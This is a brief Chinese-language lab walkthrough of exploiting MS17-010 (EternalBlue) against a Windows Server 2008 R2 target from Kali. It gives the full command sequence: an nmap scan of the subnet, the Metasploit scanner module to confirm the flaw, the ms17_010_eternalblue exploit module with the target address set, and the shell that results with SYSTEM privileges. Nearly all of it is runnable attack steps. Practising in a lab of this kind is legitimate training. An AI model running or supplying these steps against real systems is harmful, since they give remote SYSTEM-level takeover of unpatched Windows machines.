一、环境搭建
攻击机:kali 2024
目标靶机:windows 2008 R2
二、开始操作
确定win2008所在网段为192.168.26.0/24
使用kali自带的nmap扫描nmap 192.168.26.0/24 -v
我们应重点关注445和139端口,从扫描结果来看,靶机的IP为192.168.26.137
启动msf
搜索永恒之蓝的EXP:search ms17_010
先使用这个模块探测一下目标是否存在这个漏洞
use auxiliary/scanner/smb/smb_ms17_010
show options
set rhost 192.168.26.137
run
run之后,出现如下类似信息,说明存在该漏洞
然后使用之前搜索到的攻击模块
use exploit/windows/smb/ms17_010_eternalblue
show options
set rhost 192.168.26.137
run
等待攻击完成后,会反弹回一个shell
输入shell
会进入到传统shell界面
这时由于编码原因,会导致乱码,接着输入chcp 65001
即可解决乱码
可以查看当前用户权限为system